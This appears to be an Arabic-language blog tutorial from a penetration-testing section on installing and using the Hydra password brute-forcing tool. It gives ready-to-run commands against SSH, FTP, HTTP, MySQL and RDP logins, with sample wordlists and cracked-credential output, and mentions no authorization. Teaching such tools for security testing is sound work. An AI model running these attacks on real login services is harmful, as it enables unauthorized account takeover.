Blog Wallpaper
A
ALI ALAKABRالسبت، 28 يونيو 2025

Hydra

أداة Hydra هي أداة قوية لتجربة تخمين كلمات المرور (Brute Force) على خدمات تسجيل الدخول مثل SSH، FTP، HTTP، وغيرها.

منذ 5 أشهر

Area Iconالأمن السيبراني - إختبار الإختراق9.5 النسخة

شنو هي Hydra؟

هي أداة مفتوحة المصدر مختصة باختبار كلمات المرور باستخدام طرق Brute-Force أو Dictionary Attack، وتستخدم ضد بروتوكولات وخدمات مختلفة مثل:

  • HTTP / HTTPS
  • FTP
  • SSH
  • Telnet
  • SMTP
  • MySQL
  • RDP
  • وغيرها هواية...

يعني باختصار: إذا عندك Service بيها تسجيل دخول، تكدر تستعمل Hydra تجرب آلاف كلمات المرور بطريقة آلية لحد ما تحصل Valid Creds.

طريقة التثبيت:

غالبًا تكون مثبتة مسبقًا على توزيعة Kali Linux. بس إذا مو موجودة:

على Kali أو Debian/Ubuntu:

sudo apt update
sudo apt install hydra -y

تتأكد من التثبيت :

hydra -h
تشغيل الأداة
تشغيل الأداة

طريقة الاستخدام:

نحاول نخلي Hydra تجرب Login على سيرفر SSH:

1. نجهز لستة الـUsers:

nano users.txt

مثلاً نكتب:

root
admin
user

2. نجهز لستة كلمات المرور:

nano passwords.txt

مثلاً نكتب:

123456
password
admin123

او تكدر تستعمل لستات جاهزة من أي مصدر مثلاً من Github

3. نشغل الأداة:

hydra -L users.txt -P passwords.txt ssh://192.168.1.100
  • -L لستة المستخدمين.
  • -P قائمة الباسوردات.
  • ssh://IP هو البروتوكول + الآي بي الخاص بالجهاز الهدف.

النتيجة:

إذا وحدة من الـCreds صحيحة، راح تطبعلك:

[22][ssh] host: 192.168.1.100   login: admin   password: admin123

استخدامات ثانية:

البروتوكولالأمر
FTPhydra -L users.txt -P pass.txt ftp://target
HTTP Basic Authhydra -L users.txt -P pass.txt http://target/
MySQLhydra -L users.txt -P pass.txt mysql://target
RDPhydra -L users.txt -P pass.txt rdp://target

بعض الـOptions المهمة:

  • -t: تحدد عدد الثريد (العمليات المتزامنة). مثلًا -t 4
  • -V: يطبع المحاولات وحدة وحدة يعني ينطيك تفاصيل
  • -f: يتوقف أول ما يحصل البيانات الصحيحة
  • -o: يحفظ النتائج بملف

مثال :

hydra -L users.txt -P passwords.txt -t 6 -V -f ssh://192.168.1.100 -o result.txt